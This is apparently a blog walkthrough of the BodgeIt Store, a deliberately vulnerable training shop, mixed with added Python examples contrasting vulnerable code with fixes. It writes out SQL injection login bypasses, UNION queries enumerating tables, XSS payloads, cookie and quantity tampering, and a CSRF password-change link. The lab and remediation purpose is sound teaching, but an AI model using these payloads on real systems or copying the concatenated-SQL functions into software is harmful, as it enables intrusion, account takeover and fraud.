Friday, August 1, 2014

Bodgeit

View source code:
./js/util.js
<!-- td align="center" width="16%"><a href="admin.jsp">Admin</a></td-->

Website structure:
home.jsp
about.jsp
contact.jsp
admin.jsp
login.jsp
register.jsp
basket.jsp
search.jsp
advanced.jsp
product.jsp?typeid=1
product.jsp?prodid=1

Login as test@thebodgeitstore.com:
Login using SQL injection with test@thebodgeitstore.com' or '1'='1 as username and any password.

Login as user1@thebodgeitstore.com:
Login using SQL injection, any username and a' or '1'='1 as password.

Login as admin@thebodgeitstore.com:
Login using SQL injection with admin@thebodgeitstore.com' or '1'='1 as username and any password.

Find hidden content as a non-admin user:
View the source code of home.jsp and find <!-- td align="center" width="16%"><a href="admin.jsp">Admin</a></td-->

Find diagnostic data:



Level 1: Display a popup using: <script>alert("XSS")</script>
Input 123<script>alert("XSS")</script> in the search input text field

Level 2: Display a popup using: <script>alert("XSS")</script>
Register a new user with username as a@a.com<script>alert("XSS")</script>

Access someone else's basket:
View any product and click "Add to Basket", then change the value of the cookie "b_id" to another user's basket id, such as 1.

Get the store to owe you money:
Log in as a registered user and buy something. When clicking the "Update Basket" button, tamper with the submitted data, change the quantity to a negative number such as -10, and submit.

Change your password via a GET request:
View the source code of the change password page, change the form method from post to get, and then change your password.

Conquer AES encryption, and display a popup using: <script>alert("H@cked A3S")</script>
View the source code of advanced.jsp:

<SCRIPT>
    loadfile('./js/encryption.js');
   
    var key = "31a3fce1-9908-4f";
   
    function validateForm(form){
        var query = document.getElementById('query');
        var q = document.getElementById('q');
        var val = encryptForm(key, form);
        if(val){
            q.value = val;
            query.submit();
        }  
        return false;
    }
   
    function encryptForm(key, form){
        var params = form_to_params(form).replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39');
        if(params.length > 0)
            return Aes.Ctr.encrypt(params, key, 128);
        return false;
    }  
</SCRIPT>

Change the "encryptForm" function to

    function encryptForm(key, form){
        var params = form_to_params(form);
        if(params.length > 0)
            return Aes.Ctr.encrypt(params, key, 128);
        return false;
    }

Conquer AES encryption and append a list of table names to the normal results:
First change the JavaScript as in the previous step (to see detailed error information, add "?debug=true" to the URL), then try to inject the following SQL:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables),2,3,4,5 from products -- 123

The following error message is displayed:
DEBUG System error: java.sql.SQLException: ORDER BY with LIMIT required in statement [SELECT PRODUCT, DESC, TYPE, TYPEID, PRICE FROM PRODUCTS AS a JOIN PRODUCTTYPES AS b ON a.TYPEID = b.TYPEID WHERE PRODUCT LIKE '%xxxx' union select (select limit 0 1 table_name from information_schema.system_tables)]

So add an "order by" clause:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables order by table_name),2,3,4,5 from products -- 123

We get the table name!

Then change "limit 0 1" to "limit 1 1", "limit 2 1", … to enumerate the remaining tables.
That completes this challenge.
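Both the login bypasses above and the union injection in the search box come from the same defect: user input is concatenated into the SQL string, so the quotes in the input end the literal and the rest is parsed as SQL. The following added example (not BodgeIt's code; it uses an in-memory SQLite database with constructed users/products tables in place of the store's HSQLDB schema) puts the concatenating login and search next to their parameterised versions, fed with the exact payloads from this page. The vulnerable search also echoes the driver's exception the way the "?debug=true" output does, which is what gave away the "ORDER BY with LIMIT required" hint.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the store's tables (not the real BodgeIt schema).
    Passwords are stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, product TEXT, price REAL);
        INSERT INTO users (username, password) VALUES
            ('user1@thebodgeitstore.com', 'password1'),
            ('test@thebodgeitstore.com', 'password2'),
            ('admin@thebodgeitstore.com', 'password3');
        INSERT INTO products (product, price) VALUES
            ('Basic Widget', 12.00), ('Zip a dee doo dah', 3.50);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: quotes inside the input become part of the SQL,
    so  x' or '1'='1  turns the WHERE clause into a tautology."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the driver sends the input as data, it is never parsed
    as SQL, so the same payload is just a username that does not exist."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term):
    """Concatenated LIKE search. On a malformed statement it returns the raw
    driver error to the caller, mimicking the page's DEBUG output, which is a
    second defect: the message tells the tester how to fix the injected SQL."""
    sql = "SELECT product, price FROM products WHERE product LIKE '%" + term + "%'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "DEBUG System error: " + str(exc)


def search_safe(conn, term):
    """The % wildcards are added to the bound value, so the whole search term,
    quotes and comment markers included, is one string literal."""
    sql = "SELECT product, price FROM products WHERE product LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "test@thebodgeitstore.com' or '1'='1", "anything"))
    print(login_safe(db, "test@thebodgeitstore.com' or '1'='1", "anything"))
    print(search_safe(db, "Widget"))
```

The login that succeeds with "any username and a' or '1'='1 as password" returns the first row of the table, which is why the page lands on user1: the injected OR is true for every row and the query has no ORDER BY. In production the user-visible error should be a generic message and the exception should go to the server log only.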

On the contact us page, input <script>alert("XSS")</script> and submit; only "alert(XSS)" is displayed in the page, because "<script>", "</script>" and double quotes are filtered. So change the input to <SCRIPT>alert('XSS')</SCRIPT> and resubmit. The XSS fires.

Log in with the username and password:  <script>alert("XSS")</script>/a' or '1'='1
The XSS fires.
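The contact-page, register-page and login-page popups all work because the output is not encoded for its HTML context; the contact page's blacklist only removes a few exact lower-case strings, so a different spelling of the same tag walks through it. The following added example (not BodgeIt's code; the blacklist is reconstructed from the behaviour the page describes) compares that filter with ordinary HTML output encoding on the page's own payloads.

```python
import html
import re


def blacklist_filter(value):
    """Reconstruction of what the page observes on contact.jsp: the literal
    strings "<script>", "</script>" and the double quote are removed.
    Case-sensitive, so <SCRIPT> is untouched. Not the real BodgeIt code."""
    for bad in ("<script>", "</script>", '"'):
        value = value.replace(bad, "")
    return value


def render_with_filter(value):
    """Page template that trusts the blacklist and echoes the result as markup."""
    return "<p>" + blacklist_filter(value) + "</p>"


def render_with_encoding(value):
    """Contextual output encoding for text inside an HTML element: every
    character with meaning to the HTML parser is replaced by an entity,
    regardless of case or spelling, so the browser shows it as text."""
    return "<p>" + html.escape(value, quote=True) + "</p>"


def contains_script_tag(markup):
    """Crude detector used only to show which rendering still contains a
    real (unencoded) script tag; a browser would do the actual parsing."""
    return re.search(r"<\s*script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    for payload in ('<script>alert("XSS")</script>', "<SCRIPT>alert('XSS')</SCRIPT>"):
        print(render_with_filter(payload))
        print(render_with_encoding(payload))
```

Encoding does not change what the user typed; it only changes how the browser interprets it, so a username like a@a.com<script>alert("XSS")</script> can be stored as-is and still rendered harmlessly on every page that prints it.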

On the advanced search page (advanced.jsp), view the source code and find onsubmit="return validateForm(this);false;"; delete this event handler and a 500 error occurs.

Submit "http://localhost:8080/bodgeit/password.jsp?password1=111111&password2=111111" in contact.jsp; if the admin views the feedback, CSRF will happen.
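The GET password change and the feedback-page CSRF are one weakness seen twice: the server accepts a password change from any request that carries the two fields, whatever its method and whoever caused the browser to send it. The following added example (hypothetical handler, not BodgeIt's password.jsp) shows the two server-side checks that close it: refuse state changes on GET, and require a per-session token that a planted link cannot know.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Generate a random per-session token, keep it server-side and return it
    so the change-password form can embed it in a hidden field."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def change_password(method, form, session):
    """Hypothetical replacement for the page's password change handling.
    method: HTTP method; form: submitted fields; session: server-side session.
    Returns (changed, reason)."""
    # 1. State-changing actions are POST only. A URL such as
    #    password.jsp?password1=...&password2=... planted in the feedback
    #    form must do nothing when the admin merely views it.
    if method != "POST":
        return False, "password change requires POST"

    # 2. The request must carry the token issued to this session. Another user
    #    cannot obtain it, so a cross-site form post fails here. Constant-time
    #    comparison avoids leaking the token through timing differences.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"

    # 3. Ordinary validation stays on the server, where the client cannot edit
    #    it out the way the page edits the form method or the JavaScript.
    p1, p2 = form.get("password1", ""), form.get("password2", "")
    if not p1 or p1 != p2:
        return False, "passwords empty or do not match"

    session["password_changed"] = True  # stand-in for updating the user record
    return True, "changed"


if __name__ == "__main__":
    sess = {}
    token = issue_csrf_token(sess)
    print(change_password("GET", {"password1": "111111", "password2": "111111"}, sess))
    print(change_password("POST", {"password1": "111111", "password2": "111111",
                                   "csrf_token": token}, sess))
```

Setting the session cookie with SameSite=Lax (or Strict) is a useful second layer, but the token check is the one that does not depend on browser behaviour.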

5 comments:

  1. Hi
    Sorry for my English, thanks for your instructions about BodgeIt, it helps me to train.
    But one manipulation I haven't succeeded at:
    the encrypt form, I don't know how to modify the script and re-execute it. I use Firefox, F12 and the built-in tools of Firefox; I try to modify it there but it doesn't work. If you can help, I will be grateful.